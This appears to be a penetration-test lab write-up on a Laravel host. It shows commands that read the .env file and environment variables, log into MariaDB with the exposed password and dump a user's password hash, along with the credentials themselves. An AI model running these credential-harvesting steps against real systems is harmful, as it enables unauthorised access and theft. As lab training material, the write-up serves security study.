LaVita_DB

Database

---

PEAS has identified that the DB credential for the target Laravel instance is accessible in the environment variables

www-data@debian:/var/www/html/lavita$ cat .env
APP_NAME=LaVita
APP_ENV=local
APP_KEY=base64:zfXJipTpbCyrZHRDpn0/NmdpHTbAl7/hCMf476EP1LU=
APP_DEBUG=true
APP_URL=http://hb02.onsec
 
LOG_CHANNEL=stack
LOG_LEVEL=debug
 
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=lavita
DB_USERNAME=lavita
DB_PASSWORD=sdfquelw0kly9jgbx92
 
BROADCAST_DRIVER=log
CACHE_DRIVER=file
QUEUE_CONNECTION=sync
SESSION_DRIVER=file
SESSION_LIFETIME=120
 
REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379
 
MAIL_MAILER=smtp
MAIL_HOST=smtp.mailtrap.io
MAIL_PORT=2525
MAIL_USERNAME=null
MAIL_PASSWORD=null
MAIL_ENCRYPTION=null
MAIL_FROM_ADDRESS=null
MAIL_FROM_NAME="${APP_NAME}"
 
AWS_ACCESS_KEY_ID=
AWS_SECRET_ACCESS_KEY=
AWS_DEFAULT_REGION=us-east-1
AWS_BUCKET=
 
PUSHER_APP_ID=
PUSHER_APP_KEY=
PUSHER_APP_SECRET=
PUSHER_APP_CLUSTER=mt1
 
MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}"
MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"
 
 
www-data@debian:/var/www/html/lavita$ env
env
DB_PASSWORD=sdfquelw0kly9jgbx92
MAIL_PORT=2525
REDIS_PASSWORD=null
LOG_LEVEL=debug
REDIS_HOST=127.0.0.1
AWS_DEFAULT_REGION=us-east-1
MIX_PUSHER_APP_CLUSTER=mt1
PWD=/var/www/html/lavita
CACHE_DRIVER=file
MAIL_FROM_ADDRESS=null
DB_PORT=3306
MAIL_MAILER=smtp
APACHE_LOG_DIR=/var/log/apache2
LANG=C
MAIL_USERNAME=null
PUSHER_APP_CLUSTER=mt1
APP_KEY=base64:zfXJipTpbCyrZHRDpn0/NmdpHTbAl7/hCMf476EP1LU=
APP_ENV=local
MAIL_PASSWORD=null
APP_DEBUG=true
AWS_SECRET_ACCESS_KEY=
INVOCATION_ID=b7df21ee0b3b4c35b6dc321a03d992b2
APP_URL=http://hb02.onsec
APACHE_PID_FILE=/var/run/apache2/apache2.pid
DB_USERNAME=lavita
PUSHER_APP_ID=
DB_CONNECTION=mysql
TERM=xterm-256color
DB_HOST=127.0.0.1
PUSHER_APP_KEY=
APACHE_RUN_GROUP=www-data
PUSHER_APP_SECRET=
MIX_PUSHER_APP_KEY=
APACHE_LOCK_DIR=/var/lock/apache2
APP_NAME=LaVita
SHLVL=2
AWS_ACCESS_KEY_ID=
LOG_CHANNEL=stack
QUEUE_CONNECTION=sync
BROADCAST_DRIVER=log
MAIL_FROM_NAME=LaVita
AWS_BUCKET=
REDIS_PORT=6379
APACHE_RUN_DIR=/var/run/apache2
SESSION_DRIVER=file
JOURNAL_STREAM=8:11424
APACHE_RUN_USER=www-data
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
MAIL_ENCRYPTION=null
MAIL_HOST=smtp.mailtrap.io
DB_DATABASE=lavita
SESSION_LIFETIME=120
_=/usr/bin/env
OLDPWD=/var/www

DB credential identified; lavita:sdfquelw0kly9jgbx92 The password must be checked for reuse

www-data@debian:/var/www/html/lavita$ mysql -ulavita -psdfquelw0kly9jgbx92
 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 37
Server version: 10.5.21-MariaDB-0+deb11u1 Debian 11
 
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
MariaDB [(none)]> 
MariaDB [(none)]> use lavita;
use lavita;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
 
Database changed

Session established

MariaDB [lavita]> SELSELECT name,password FROM users;
SELECT name,password FROM users;
+------+--------------------------------------------------------------+
| name | password                                                     |
+------+--------------------------------------------------------------+
| test | $2y$10$KJn5GEnDVdE/lrVSrC/3LOmgwW4x3czcRphMJEDr3H97M1CQ8a90q |
+------+--------------------------------------------------------------+
1 row in set (0.000 sec)

There is no other user besides the testing account